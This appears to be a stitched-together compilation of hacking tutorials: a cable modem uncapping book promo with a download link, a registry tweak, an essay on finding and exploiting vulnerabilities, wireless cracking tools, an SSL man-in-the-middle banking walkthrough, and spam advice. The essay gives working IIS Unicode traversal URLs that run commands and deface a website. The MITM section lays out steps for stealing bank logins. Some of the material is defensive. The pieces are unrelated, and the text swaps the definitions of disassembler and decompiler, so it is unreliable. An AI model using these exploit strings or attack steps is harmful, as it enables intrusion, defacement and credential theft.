Hacking Cable Modem

Hacking the Cable Modem goes inside the device that makes Internet via cable possible and, along the way, reveals secrets of many popular cable modems, including products from Motorola, RCA, WebSTAR, D-Link and more.

Inside Hacking The Cable Modem, you'll learn:
• the history of cable modem hacking
• how a cable modem works
• the importance of firmware (including multiple ways to install new firmware)
• how to unblock network ports and unlock hidden features
• how to hack and modify your cable modem
• what uncapping is and how it makes cable modems upload and download faster

Written for people at all skill levels, the book features step-by-step tutorials with easy to follow diagrams, source code examples, hardware schematics, links to software (exclusive to this book!), and previously unreleased cable modem hacks.

Download
Code:
http://depositfiles.com/files/383581

Internet Booster

increase internet speed

Open regedit and perform following operatios

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro

lSet\Services\Tcpip\Parameters]

"SackOpts"=dword:00000001

"TcpWindowSize"=dword:0005ae4c

"Tcp1323Opts"=dword:00000003

"DefaultTTL"=dword:00000040

"EnablePMTUBHDetect"=dword:00000000

"EnablePMTUDiscovery"=dword:00000001

"GlobalMaxTcpWindowSize"=dword:0005ae4c

How Hackers Break Into Computers

How to Discover New Vulnerabilities

Many of the most skilled individuals involved in discovering new ways to break into computers work in corporate, governmental, or academic laboratories. They not only use considerable brainpower and creativity in their jobs but also typically create and use sophisticated software tools to assist them in their research duties. (The National Security Agency, or NSA, was one of the earliest government agencies to create such a research group). Even in these research environments, the people who find ways to break into computers typically describe themselves as "hackers."

What follows are some examples of techniques for finding vulnerabilities and the places to obtain the software tools to assist in these discoveries.

Examination of Source Code

Many companies have teams testing their products for security flaws. In these circumstances, the analyst has access to the source code (that is, commands the programmers write). This process is called "white-box" analysis. Depending on the software language they are examining for vulnerabilities, usually there are programs that will scan for commands or syntax known to cause problems. Some programming languages, most famously Java, are inherently designed to resist security flaws. Yet even Java programs sometimes have vulnerabilities offering ways to break into computers.

Many companies choose to program in languages such as C or C++ to save money. The latter are not only easy to program but also run fast. The problem is that these languages are rife with security hazards. Though a well-known list exists of hazardous commands in these languages and simple programs identifying all these uses, ways are available to rewrite these programs to get around the hazardous commands.

Some software, such as the Mozilla browser and the OpenBSD operating systems, is developed by loosely organized teams of unpaid volunteers. The potential for loosely supervised programmers to write buggy and vulnerable code is therefore high. These team projects have typically solved the problem by giving the public access to the source code; such access is known as "open access." Open access literally means that anyone can examine the code for vulnerabilities enabling computer break-ins. The potential for fame and offers for dream jobs have motivated many a volunteer to run exhaustive checks for vulnerabilities. As a result, Mozilla and OpenBSD are now known for being almost free of security vulnerabilities.

Disassemblers and Decompilers

The greatest opportunity for hackers and crackers to find ways to break into computers is with software written by organizations using hazardous programming languages, organizations that do not train their programmers how to write secure code, and organizations that do not test their software for security flaws. Even companies that make efforts to produce secure software can end up shipping products that hide what appears to be an almost infinite number of break-in ­vulnerabilities.

With each new release of a major software product, teams of professionals in organizations such as the NSA and computer security companies (not to mention amateurs and computer criminals) labor to find these problems. The main issue for these teams of professionals is that they usually do not have the source code of the software they are examining. When lacking the source code, these teams then turn to using disassemblers and decompilers.

A disassembler converts a program back into the original programming language. This is a difficult task, and it is likely to work only with a small program, typically one written in Java. A decompiler converts software into assembly language. Assembly language is a low-level language far more difficult to understand than the high-level languages in which most computer programs are written. Nevertheless, a sufficiently talented programmer can analyze assembly language. Although decompilers are typically able to handle larger programs than are disassemblers, they can process only comparatively small programs. Today, decompilers are the tools of choice to analyze worms, viruses, and other small instances of malware (that is, malicious programs).

Some examples of disassemblers and decompilers include the SourceTec Java decompiler, at http://www.sothink.com/decompiler/index.htm; the IDA-Pro Interactive Disassembler, at http://
www.datarescue.com; and a number of free disassembler and decompiler tools, at http://protools
.anticrack.de/decompilers.htm.

Debuggers

For larger programs and for additional analysis of programs for which one has the source code or those that have been disassembled, professional teams may find flaws by running the programs through a "debugger," which operates a program one step at a time and allows individuals to view what is in memory at each step. One commercial debugger is SoftIce, described at http://
www.compuware.com. Another is Dumpbin, a Windows program bundled with the Microsoft C++ compiler. On UNIX systems, the most frequently used debugger is gdb, which is shipped as part of most Linux distributions and available without fee for commercial versions of UNIX.

Fault Injection

In the case of Windows XP, some 40 million lines of source code (which the Microsoft Corporation keeps secret) confront the analyst team or crackers. No decompiler can extract code from such a big program. Even a debugger would make little headway. So, other alternatives are sought, the most prevalent of which is the "black box" analysis. In this process, the professional analyst team or crackers try to find all the possible ways to give inputs. They then try the inputs to determine whether they have the potential to "crash" a system or evade security. Because of the difficulty of this process, the team or the individual uses a "fault injection" tool to speed this technique. Examples of fault injection include a database query crafted to command a database server to erase everything, or a Web browser URL infecting a Web server with a worm. The process of trying all those different inputs looking for some fault is also known as fuzzing.

Some examples of commercial fault injection tools include Hailstorm, found at http://cenzic
.com; Failure Simulation Tool, found at http://cigital.com; and Holodeck, found at http://www
.sisecure.com/.

Buffer Overflows

Buffer and heap overflows are special cases of fault injection. Testing for these conditions has discovered the majority of computer security flaws known today. Basically, a "buffer overflow" is a condition whereby too much data is placed in too little allocated space in a computer's memory. The extra data, if properly crafted, and if inserted into a program with the right kind of access to memory, can end up in a region of memory enabling a break-in.

Crackers have discovered buffer overflows by simply trying super-long data inputs, such as typing a long URL into a browser location window. A super-long URL is an example of an "injection vector." When the attacker sees some sort of error condition resulting from this injection, this is a sign that a buffer overflow has occurred. An example of an error condition is to get the error message on a UNIX-type of system known as "segmentation fault." The trick is to see whether one may use the overflow condition to break into a computer.

The attacker next inserts "shellcode" into this long string of data. Shellcode is a compiled program actually performing the break-in. Shellcode is the "payload" of the exploit.

At this stage, the trick is to use the buffer overflow to place the payload into the exact place in memory to get it to run. A common way to do this is to place many "NOP" commands in front of the payload. NOP means "no operation"-meaning that the program should do nothing. It may seem amazing that computers would be designed to accept commands to do nothing, but this feature is essential to the majority of exploits. The advantage to using NOP commands is that it does not matter where the payload is inserted into the buffer overflow because any commands cut off at the beginning of the payload are merely NOPs. A series of NOPs is often coded as "AAAAAAAAAAA. . . ."

Buffer overflow discoveries are made easier by automating tests for overflows. However, such tests cannot be done blindly by just running a fault injection program. The process takes a bit of creativity. The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, Sinan "noir" Eren, Neel Mehta, and Riley Hassell (Wiley Publishing, Inc., 2004) focuses on how to discover and exploit buffer overflows and ­similar overflow conditions. Shellcode is platform specific, meaning that a sequence of commands that works for a Windows platform will not work for a UNIX system, and vice versa. A great tool to set up automated exploits is metasploit.

Communication and Social Aspects of Finding Vulnerabilities

Most scientific and engineering endeavors are shared with the scientific community through newsletters and journal articles. When it comes to the invention of various ways to break into computers, information flow within the security field and in the Computer Underground (CU) is alive and well. In fact, a number of email lists are devoted to the discovery of vulnerabilities, including Bugtraq, found at http://www.security focus.com; Vuln-dev, found at http://www
.securityfocus.com; and Full-disclosure, found at http://www.netsys.com.

The following is an example of how these collaborations in the CU can result in the discovery of vulnerabilities. On July 9, 2004, someone calling himself "Jelmer" at jkuperus@planet.nlThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it wrote this to the Full-disclosure email list:

INTRODUCTION

Actually I wasn't really sure if I ought to post this, but after some consideration I decided that it might serve as an example of the completely messed up state we find Internet explorer in today. There's a very minor issue with the way the Sun Java virtual machine creates temporary files from applets. IE [Internet Explorer] blows it off the chart, combining this with some unresolved issues in IE can lead to remote code execution [ability to break into a computer through IE].

Jelmer next cited two people who made discoveries that gave him ideas about how to find new vulnerabilities:

A couple of days back Marc Schoenfeld posted an advisory about an implementation flaw in the Sun Java virtual machine.... My partner in crime HTTP-EQUIV was investigating this report when he noticed that this demo created a temporary file in his temp folder called +~JFxxxxx.tmp where xxxxx is a random 5 digit number, He mailed me to say hey take a look at this.

Jelmer then cited the fact that he used a decompiler to assist with his process of discovery:

I decompiled marcs [sic] class [Java program] and noticed that the .tmp file being created contained the exact contents of the byte array that got passed to Font.createFont. Now If you can create a file on someone's disk drive and get your browser to render it, we've got our selves something

Jelmer then provided the source code to a demonstration program he wrote. In explaining how this program works, he credited yet another discovery he had seen on that email list:

Using an old bug (http://lists.netsys.com/pipermail/full-disclosure/2004-February/016881.html)...

Then Jelmer provided another program he had written. He credited a post of the Bugtraq email list as a solution to the final piece of the puzzle:

Bang! We would have remote code execution, well at least if we'd know the username :) Well, that's not an issue either (http://seclists.org/bugtraq/2004/Jun/0308.html)....

Jelmer ended his post by providing a demonstration of this technique at http://poc.homedns
.org/execute.htm. (The Website is no longer available, a rather common outcome for such sites).

Often, individuals in the CU complain that social communications there can get rather rude and insulting, a reality known as flaming. Flaming is not a rarity, and ad hominem arguments and the circulation of ridiculous gossip are common there. To help protect their self-esteem, therefore, most participants use aliases or monikers to hide their real identities. However, despite this emotionally chaotic environment, which often breaks the usual rules for brainstorming and maintaining harmonious environments, those in the Computer Underground do tend to make many creative discoveries and to write many exploits.

Also, although hackers in the CU claim that their social environment is relatively free from race and gender biases, many women there have admitted that they feel the environment can be especially unkind to them. This unkindness is probably due to hostility that goes far beyond saying impolite things. Vetesgirl (a.k.a. Rachelle Magliolo) of Sarasoto, Florida, serves as a modern-day female case in point. Vetesgirl wrote a well-regarded security scanner that is still offered for free download from many computer security Websites. Soon after its release, however, the hacker Website www.Antioffline.com launched a campaign of abuse against her.

Here is an example of what was posted: "90% of our viewers agree self-evident.com [Vetesgirl's Website] should be renamed self-centered.com. View Vetesgirl's page where its [sic] all about her and who she can get busted with her elite shell scripting skills."

It was not too long after this posting appeared that some cybercriminals succeeded in running her Website off the Internet. The sad part is that Vetesgirl seems to have vanished from the hacker scene altogether, unless, of course, she is now participating in the Computer Underground while masquerading as a male.

Because of penalties such as these, it is unclear how many of the individuals who discover software vulnerabilities are actually women.

Reconnaissance

It is one thing to know that certain vulnerabilities exist, but knowing exactly under what conditions vulnerabilities may translate into an opportunity for someone to break into a computer system is nontrivial. For this reason, system security analysts conduct "reconnaissance" to ensure that they have patched all known security flaws in their systems. Programs that analysts use in safeguarding their system include Nessus, found at http://www.nessus.org, as well as products from Internet Security Systems (found at http://www.iss.net) and from GFI LANguard Network Security Scanner (found at http://www.gfi.com).

Moreover, a properly configured and tweaked Intrusion Detection System (IDS) should notify the network administrator of any scanning being done on the system by outsiders, unless the attacker uses IDS evasion techniques, which require a somewhat more sophisticated approach on the attacker's part. Once alerted to a break-in attempt, most administrators can block the attacker and help authorities to track him or her down.

A skillful computer criminal is unlikely to use any of the products just cited. Rather, a skilled attacker uses something more stealthy, such as the nmap port scanner. The port scanner (described at www.insecure.org) does not tell the attacker nearly as much good information as a port ­scanner such as Nessus does. Regardless of the quality of information, what is important to a cracker is that when run in certain modes, a port scanner is less likely to be detected by an IDS.

Some attackers will do some "social engineering" reconnaissance of their own by using techniques of the spy trade, such as pretending to be an employee of the target organization or by going through trash bins looking for documentation on the network.

Yet others who break into computers do not do any reconnaissance. Instead, they will get an exploit and use it at random, hoping to find vulnerable computers. The logs of almost every IDS show that the overwhelming majority of attacks actually had no possibility of succeeding because the attackers must have done no reconnaissance. The individuals who carelessly attack blindly are known as "scriptkiddies." Their means of attack is to blindly run programs. Many know next to nothing about how to break into computers and not be detected.

Also of importance is the fact that no "blind attacks" are conducted by human beings. Most blind attacks are performed by worms, which are automated break-in programs that run without human intervention and without performing reconnaissance.

Statistics, updated daily on break-in attacks, can be found at http://isc.incidents.org/.

The Attack

After the cracker has detected vulnerabilities in the system he or she has decided to attack, the next step is to carry out the attack. In some cases, the exploit itself is easy. What follows is an example of an exploit to break into a Windows 2000 Web server and deface its Website. This exploit will work on Windows 2000 Server or Windows Professional, but only if it has not been patched beyond Service Pack 2, and only if it is running IIS or a Personal Web Server that is not patched.

Step One

The attack program is simply a Web browser, and the attacker just has to insert a series of URLs in the location window. The first URL identifies whether the server is likely to be vulnerable:

http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"dir%20c:\"

In the preceding URL, %20 means "space." The "+" also means "space." The %255c is Unicode encoded. After it goes through the Unicode translation, the attacker winds up with 5c, which is hex for ‘\'. So from the string ..%255c..%255c, you get ..\..\ for "go up two directories."

If the victim computer is vulnerable, the attacker's browser will show something like the ­following:

Directory of c:\09/21/2001 09:59a ASFRoot

09/22/2001 06:53a Documents and Settings

09/21/2001 05:06p Inetpub

09/29/2001 05:37p Microsoft UAM Volume

09/21/2001 05:09p Program Files

10/01/2001 03:57p WINNT

0 File(s) 0 bytes

6 Dir(s) 8,984,092,672 bytes free

Step Two

The next malicious URL the attacker must insert is as follows:

http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"copy%20..\..\
winnt\system32\cmd.exe%20..\scripts\cmd1.exe"

This copies cmd.exe (running the MS-DOS program in Windows 2000, NT and XP) into the Web server's scripts directory. This directory holds CGI (Common Gateway Interface) programs. (Examples of CGI programs are shopping carts and programs to search the local Website.) If the server is vulnerable, the attacker sees the following in the browser:

CGI Error.

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are

1 file(s) copied.

This error message reveals that the attack copied the cmd.exe program into the scripts ­directory.

Step Three

The final step is to insert this URL:

http://victim.com/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+I%20broke%20in%
20Muhahaha!+../wwwroot/iisstart.asp&dir&type+../wwwroot/iisstart.asp

This creates a main page for the Website that says, "I broke in Muhahaha!" Note that this only works if the main page is named iisstart.asp. If it is named something else, such as index.shtml, the attacker must make the substitution for the proper main page name.

Where does the attacker find instructions and programs for breaking into computers? Public sources include Websites and computer manuals. The archives of email lists devoted to discoveries of vulnerabilities are also excellent sources. There are also Websites offering downloads of break-in and reconnaissance programs. Some examples include Zone-h, found at http://www
.zone-h.org; Packetstorm, found at http://www.packetstorm.nl and Packetstorm Security, at http://www.packetstormsecurity.org; and Cgi Security, at http://cgisecurity.com/.

Verification

Whether the attack on a computer has been carried out in a research lab, in a war game, or as a computer crime, the attacker typically wants to know whether he, she, or it (in the case of a worm) succeeded. In most cases of attack, the verification analysis is obvious. In the case of worm-induced cases of attack, those who unleash the worms often program them to report to an Internet Relay Chat channel or a Web server. More often, the creator of a worm either does not care which computers it broke into, or he or she uses a scanner to detect whether the worm has taken over a computer. Usually this is a Trojan "back door," named after the Trojan horse used by the Greeks to invade the ancient city of Troy. These back doors invite attackers to remotely to take over control of the victimized computer. Many computer break-ins are simply caused by crackers scanning computers for these back doors.

Many Websites list the more common Trojans and the ports through which one may access them. These include Intrusion Detection FAQ, found at http://www.sans.org/resources/idfaq/
oddports.php; DOS Help, found at http://www.doshelp.com/trojanports.htm; and Packetstorm Security, found at http://packetstormsecurity.org/trojans/trojan.ports.txt.

Wireless Hacking And Prevention

Finding Wireless Networks

Locating a wireless network is the first step in trying to exploit it. There are two tools that are commonly used in this regard:

Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.

(NetStumbler Screenshot)

Kismet – One of the key functional elements missing from NetStumbler is the ability to display Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you should realize that Access Points are routinely broadcasting this info; it just isn’t being read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical in finding wireless networks.

(Kismet Screenshot)

Attaching to the Found Wireless Network

Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t using any type of authentication or encryption security, you can simply connect to the SSID. If the SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network is using authentication and/or encryption, you may need one of the following tools.

Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional tools and strategies that can be used to force the generation of traffic on the wireless network to shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.

(Screenshot of Airsnort in Action)

CowPatty – This tool is used as a brute force tool for cracking WPA-PSK, considered the “New WEP” for home Wireless Security. This program simply tries a bunch of different options from a dictionary file to see if one ends up matching what is defined as the Pre-Shared Key.

(Cowpatty Options Screenshot)

ASLeap – If a network is using LEAP, this tool can be used to gather the authentication data that is being passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the authentication like other “real” EAP types, which is the main reason why LEAP can be broken.

(Asleap Options Screenshot)

Sniffing Wireless Data

Whether you are directly connected to a wireless network or not, if there is wireless network in range, there is data flying through the air at any given moment. You will need a tool to be able to see this data.

Wireshark (formerly Ethereal) – While there has been much debate on the proper way to pronounce this utility, there is no question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.

(Screenshot of Ethereal in Action)

(Yahoo IM Session being sniffed in Ethereal)

The aforementioned utilities, or similar ones, will be necessities in your own wireless security toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab environment. And cost is no excuse as all of these tools are available freely on the Internet.

Protecting Against These Tools

Just as it’s important to know how to utilize the aforementioned tools, it is important to know best practices on how to secure your Wireless Network Against these tools.

NetStumbler – Do not broadcast your SSID. Ensure your WLAN is protected by using advanced Authentication and Encryption.

Kismet – There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure your WLAN is protected by using advanced Authentication and Encryption

Airsnort – Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software update).

Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a chance of residing in a dictionary file that would be used to try and guess your key and/or would take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to protect the authentication and limit the amount of incorrect guesses that would take place before the account is locked-out. If using certificate-like functionality, it could also validate the remote system trying to gain access to the WLAN and not allow a rogue system access.

ASLeap – Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP type.

Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break. WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine through an encrypted tunnel that would be encrypted with DES, 3DES or AES.

Online Banking and Credit Card Transactions : Hack And How to Prevent It

It is not uncommon to perform banking and to purchase products online with your credit card. It is also a common thought that doing so is secure, as this is done via SSL. For the most part, this is true and the sessions are secure. Discover Card, for example, posts the following statement on their website:

Figure 1

The problem is that it is not “virtually impossible” for someone else to see your data, such as login information or credit card numbers. It can actually be relatively easy, as you’ll see, if you as an end-user are not knowledgeable about how you can be exploited and know the signs that this is occurring.

Figure 2 (Indicates a Secure SSL Session)

Continuing with the scenario, what you didn’t realize is that a hacker has intercepted your Online Banking login credentials and credit card information and can now log into your Online Banking Website or purchase items with your credit card. How is this possible, since SSL was used and is hard to break? The answer is that you made a fatal mistake that subjected you to an SSL Man-in-the-Middle (MITM) attack.

The Attack

The fatal flaw that enabled the sensitive information to be stolen is possible when an end-user is not properly educated on an easy to do and well-known SSL exploit – SSL MITM.

Here’s how it’s done:

The hacker goes to coffee shop and connects to the same Wi-Fi network you are connected to. He runs a series of utilities to redirect other user’s data through his machine. He runs a number of other utilities to sniff the data, act as an SSL Certificate Server and to be the Man-the-Middle. The following diagram shows a very simplified graphic of how your SSL Banking session should work under normal conditions, then how it would work during an attack:

Figure 3

Figure 4

An important concept to grasp here is that a certificate is used to establish the secure SSL connection. This is a good thing, if you have a good certificate and are connecting directly to the website to which you intended to use. Then all your data is encrypted from your browser to the SSL website where the bank’s website will use the information from the certificate it gave you to decrypt your data/credentials. If that is truly the case, then it is pretty darn hard for a hacker to decrypt the data/credentials being transmitted, even if he is able to sniff your data.

This is a bad thing if you have a “Fake” certificate being sent from the hacker, and you are actually connecting to his machine, not directly to the bank’s website. In this case, your credentials are being transmitted between your browser and the hacker’s machine. The hacker is able to grab that traffic, and, because he gave you the certificate to encrypt the data/credentials, he can use that same certificate to decrypt your data/credentials.

Here are the exact steps a hacker could use to perform this attack:

The first thing he would do is turn on Fragrouter, so that his machine can perform IP forwarding

Figure 5

After that, he’ll want to direct your Wi-Fi network traffic to his machine instead of your data traffic going directly to the Internet. This enables him to be the “Man-in-the-Middle” between your machine and the Internet. Using Arpspoof, a real easy way to do this, he determines your IP address is 192.168.1.15 and the Default Gateway of the Wi-Fi network is 192.168.1.1:

Figure 6

The next step is to enable DNS Spoofing via DNSSpoof:

Figure 7

Since he will be replacing the Bank's or Online Store’s valid certificate with his own fake one, he will need to turn on the utility to enable his system to be the Man-in-the-Middle for web sessions and to handle certificates. This is done via webmitm:

Figure 8

At this point, he is setup and ready to go, he now needs to begin actively sniffing your data passing through his machine including your login information and credit card info. He opts to do this with Ethereal, then saves his capture:

Figure 9

He now has the data, but it is still encrypted with 128-bit SSL. No problem, since he has the key. What he simply needs to do now is decrypt the data using the certificate that he gave you. He does this with SSL Dump:

Figure 10

The data is now decrypted and he runs a Cat command to view the now decrypted SSL information. Note that the username is “Bankusername” and the password is “BankPassword”. Conveniently, this dump also shows that the Banking site as National City. FYI, the better, more secure banking and online store websites will have you first connect to another, preceeding page via SSL, prior to connecting to the page where you enter the sensitive information such as bank login credentials or credit card numbers. The reason for this is to stop the MITM-type attack. How this helps is that if you were to access this preceeding page first with a "fake" certificate and then proceeded to the next page where you were to enter the sensitve information, that page where you would enter the sensitive information would not display. That is because the page gathering the sensitive information would be expecting a valid certificate, which it would not receive because of the Man-in-the-Middle. While some online banks and stores do implement this extra step/page for security reasons, the real flaw in this attack is the uneducated end-user, as you'll soon see:

Figure 11

With this information, he can now log into your Online Banking Account with the same access and privileges as you. He could transfer money, view account data, etc.

Below is an example of a sniffed SSL credit card purchase/transaction. You can see that Elvis Presley was attempting to make a purchase with his credit card 5440123412341234 with an expiration date of 5/06 and the billing address of Graceland in Memphis, TN (He is alive!). If this was your information, the hacker could easily make online purchases with your card.

Figure 12

Also Real Bad News for SSL VPN Admins

This type of attack could be particularly bad for corporations. The reason for this is that Corporate SSL VPN solutions are also vulnerable to this type of attack. Corporate SSL VPN solutions will often authenticate against Active Directory, the NT Domain, LDAP or some other centralized credentials data store. Sniffing the SSL VPN login then gives an attacker valid credentials to the corporate network and other systems.

What an End-User Needs To Know

There’s a big step and end-user can take to prevent this from taking place. When the MITM Hacker uses the “bad” certificate instead of the “good”, valid certificate, the end-user is actually alerted to this. The problem is that most end-users don’t understand what this means and will unknowingly agree to use the fake certificate. Below is an example of the Security Alert an end-user would receive. Most uneducated end-users would simply click “Yes”… and this is the fatal flaw:

Figure 13

By clicking “Yes”, they have set themselves up to be hacked. By clicking the “View Certificate” button, the end-user would easily see that there is a problem. Below are examples of the various certificate views/tabs that show a good certificate compared to the bad certificate:

Figure 14
(Good Certificate) (Bad Certificate)

Figure 15
(Good Certificate) (Bad Certificate)

Figure 16
(Good Certificate) (Bad Certificate)

How an End-User Can Prevent This

• Again, the simple act of viewing the certificate and clicking “No” would have prevented this from happening.

• Education is the key for an end-user. If you see this message, take the time to view the certificate. As you can see from the examples above, you can tell when something doesn’t look right. If you can’t tell, err on the side of caution and call your Online Bank or the Online store.

• Take the time to read and understand all security messages you receive. Don’t just randomly click yes out of convenience.

How a Corporation Can Prevent This

• Educate the end-user on the Security Alert and how to react to it.

• Utilize One Time Passwords, such as RSA Tokens, to prevent the reuse of sniffed credentials.

• When using SSL VPN, utilize mature products with advanced features, such as Juniper’s Secure Application Manager or Network Connect functionality.

Conclusion

This type of attack is relatively easy to do in a public Wi-Fi hotspot environment. It could also easily happen on a home Wi-Fi network, if that Wi-Fi network isn’t properly configured and allows a hacker to connect to that home network . An educated end-user and sound security practices by corporations can protect your valuable data.

Prevent Spam

Spam: If you have an email address I bet you're fed up with the unsolicited mail you receive. The increase in spam has virtually relegated email as an adult only facility. Spam is a wast of our time. Many spam emails are obscene, many are offensive or insulting to one's intelligence e.g. "I have a zillion pounds that I want to put into your bank account, please fax your bank account details to me...This is not a scam, honest!".

There are two sides to preventing spam:

1. Stop them getting your email address: The rest of this page is about how the spammers get your email address and how to stop them from getting it.
2. What to do if they have got your email address. If the spammers have already got your email address I recommend that you change it to a new address - after you have read the rest of this page and taken the appropriate action to stop them getting your new address. If you can't change your email address here is an excellent and free spam filter: Spam Bayes.

---

Types of spam and ways to prevent it

To stop receiving spam it helps to know what kind of spam you are getting. Each type of spam requires a different method of prevention. Below are the types of spam (I am aware of) and free methods to preventing them.

• Harvested address spam

  What is it: This is probably the most common type of spam. The spammers use a computer system (spider or spam-bot') to check almost every website on the internet (including yours). The 'spam bot' looks at the code of every web page, it looks for the '@' symbol. When it finds an '@' it knows its found an email address. It then collects the bit either side of the '@' symbol to capture your email address and add it to the spammers database of millions of harvested addresses. From then on that address will receive lots of spam!
  
  How to find out if your email address is published on a website: Go to Google.com and type your email address into the search box. Google can usually show if your email address is on any website. If google can find your address you can be sure the spammers have got it. Tip: Sometimes the website-page with your email address may be very long, from Google click the link that says 'Cached' and you will see the page and your email address will be highlighted.
  
  The solution: If the spammers have harvested your email address from a website they are not going to let it go. Get a new email address and make sure your new email address is not published online. If you must publish your email address on a website get your website designer/manager to encrypt your email address so the 'spam bots' can't harvest it as they robotic ally and relentlessly crawl the web.

• Virus Spam

  What is it? This is perhaps the 2nd most common type of spam.

  1. someone else's computer (not yours) gets infected with a virus.
  2. The address book on their computer has your email address.
  3. The virus sends a spam to every address on the address book.
  4. The virus 'spoofs' the 'from address' in the email it sends i.e. the spam does not appear to have come from the senders email address, instead it says it came from another address taken from the address book.
  5. There is no point replying to the spam e.g. to say 'don't spam me' or 'your computer has a virus' - as the 'from address' is wrong, which means it will go to someone who didn't send the spam. (note this is why you might receive emails from people saying you sent a virus to them, when you know your computer is clean).
  How to prevent it: You can not prevent virus spam from being sent to you. The person with the infected computer needs to use quality anti virus software to clean their computer (see preventing computer viruses). You need a good spam filter to delete this kind of spam as it arrives.
  

• Domain name spam

  What is it? If you own a domain name for a website you are probably getting domain name spam. Spammers use the whois database to obtain a list of most of the domain names in the world (ie .com, .net. org). The spammers expect most website owners to set up generic email addresses such as sales@... and info@... They simply send spam to all of the standard generic words at email every domain name in the world.
  How to prevent it: Do not have a generic email address such as sales@ and info@. Instead have less usual addresses. Here is a list of all of the generic words (I am currently aware of) the spammers are using:
  - info@
  - mail@
  - sales@
  - contact@
  - contacts@
  - root@
  - home@
  - contacts@
  - enquiries@
  - webmaster@.
  
  Note: do not use 'catch-all forwarding' that forwards anything@ your-domain. Block all but specific names at your domain. Your website designer should be able to help you follow these steps.

• Dictionary spam

  What is it? You can sometimes receive dictionary spam when you use a well known email service. The spammers know that there is going to be a janesmith@bigmail.xyz. They setup computers to spam billions of names at that mail service simply by targeting every persons name.
  How to prevent it: Hopefully your email service provider has put anti spam systems in place to prevent this kind of spam. If they haven't then you may have to find a better email service provider.
  

• Windows Messenger Spam

  Do you get pop up boxes on your screen with the words "Messenger Service" in the title bar? If so you may be getting Windows Messenger Spam. Follow this link to learn how to turn off Windows Messenger Service.

• Hacked mail service spam

  Some ISPs or web mail services may be hacked by spammers or the addresses may be sold to spammers. Read the small print when signing up for an email account. Look hard for that box that says 'we might give your address to a 3rd party, tick here if you do not want to receive marketing info from other companies...'.
  If you can't change your email address here is an excellent and free spam filter: Spam Bayes.

Hoax Spam

These are messages that innocent people may forward to you with some kind of hoax warning or way to make a fortune. Never respond to or forward this kind of message. They are hoaxes, see real example below. If you 'CC' (copy in) your friends and contacts you may be providing a way for spammers to harvest the email addresses of your friends/contacts. These rubbish emails sometimes end with something like: "Try it; What have you got to lose?"
What you have to lose is your privacy and credibility!

Typical example:
PLEEEEEEEEASEREAD!!!! IT WAS ON THE NEWS!!
Dear Friends, Please do not take this for a junk letter.
Bill Gates is sharing his fortune. If you ignore this you will repent later. Microsoft and AOL are now the largest Internet companies and in an effort to make sure that Internet Explorer remains the most widely used program, Microsoft and AOL are running an e-mail beta test. When you forward this e-mail to friends, Microsoft can and will track it (if you are a Microsoft Windows user) for a two week time period. For every person that you forward this e-mail to, Microsoft will pay you $245.00, for every person that you sent it to that forwards it on, Microsoft will pay you $243.00 and for every third person that receives it, you will be paid $241.00. Within two weeks, Microsoft will contact you for your address and then send you a cheque. I thought this was a scam myself, but two weeks after receiving this e-mail and forwarding it on, Microsoft contacted me for my address and within days, I received a cheque for US$24,800.00. You need to respond before the beta testing is over. If anyone can afford this Bill Gates is the man. It's all marketing expense to him. Please forward this to as many people as possible. Try it; What have you got to lose????

More tools and tips to prevent spam

• Anti spam software: There are many tools you can use that check incoming mail and try to detect which is spam and which is not. The spam emails are sent to a 'trash' folder on your pc. This is the spam filter I recommend and its free: Spam Bayes.
• MailWasher.net is a free tool to check and manage your e-mails before you download them. I used to use this tool when I received a lot of spam. Its easy to use and free. The main benefit is that you can review your email before downloading it, and delete the spam remotely.
• Avoid CC (carbon copy) for group emails that you send out.
  If you send an email (to a group of people) that might be forwarded on and on, it could get into the hands of a Spammer, who you can be sure will add the nice collection addresses to their spam address database. Instead use BCC (blind carbon copy), this means the recipients do not see the list of email addresses that your message has gone to. Also encourage others to use BCC for groups instead of CC.
• Never add your friends email address to a mailing list.
  You will not get a free prize and your friend will not thank you for the extra spam they receive.

Why doesn't my anti-spam software prevent all of the spam?

Much anti-spam software identifies spam by the following methods:

• Blocking email from known spammer addresses.
• Identifying obscene words in the email.
• Identifying a form e.g. 'click here to buy this rubbish'.
• Identifying certain sales/marketing words.

Many spammers use systems to do things like the following

• Each individual spam email of the millions they send appears to come from a different address.
• The invite to buy something is actually an image of text not real text so it can't be read by your computer. The text behind the image is random words that you don't see but look innocent to your computer.
